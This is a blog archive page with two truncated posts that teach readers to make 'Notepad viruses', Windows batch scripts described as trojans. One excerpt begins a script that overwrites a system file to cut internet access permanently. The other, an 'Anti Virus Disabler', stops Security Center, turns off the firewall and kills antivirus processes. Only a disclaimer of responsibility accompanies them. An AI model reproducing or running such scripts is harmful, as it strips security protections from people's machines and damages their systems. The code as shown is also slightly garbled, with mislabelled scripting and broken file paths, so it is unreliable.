Skip to main content

Posts

Showing posts from June, 2020

Some Crazy Viruses !

Create Notepad Virus Executable(.exe) Using Bash Scripting First of all, you need a Windows PC, obviously.  😉 For this tutorial to create simple Notepad Virus you don’t need to be a die-hard programmer or something like that, but a basic knowledge of flow charts and loops helps you a lot to understand what’s going on here. So let’s start to create a trojan virus using notepad to run via command prompt(cmd) in Windows 10, 8/8.1, 7 or XP.   Now, Open the Notepad application and Copy (Ctrl+C) and Paste (Ctrl+V) the codes given below one by one for the different virus in a different file. Note :  I am not responsible for any damage or error reporting on Your PC, do it at your own risk. Warning: Do not try this on your daily working PC. Notepad Virus source codes are Given below: 1. Disable Internet Permanently This code will disable the internet connectivity permanently. echo @echo off>c:windowswimn32.bat echo break off>c:windowswimn32.bat echo ipconfig/...

Anti Virus Disabler

Create Notepad Virus Executable(.exe) Using Batch Scripting For this tutorial to create simple Notepad Virus you don’t need to be a die-hard programmer or something like that, but a basic knowledge of flow charts and loops helps you a lot to understand what’s going on here. So let’s start to create a trojan virus using notepad to run via command prompt(cmd) in Windows 10, 8/8.1, 7 or XP.   Now, Open the Notepad application and Copy (Ctrl+C) and Paste (Ctrl+V) the codes given below one by one for the different virus in a different file. Note :  I am not responsible for any damage or error reporting on Your PC, do it at your own risk. Warning: Do not try this on your daily working PC. Have you read my previous posts, it will be great to take a look at! Anti Virus Disabler This large code will disable any antivirus installed on the system. @ echo off rem rem Permanently Kill Anti-Virus net stop “Security Center” netsh firewall set opmode mode=disable tskill /A av* t...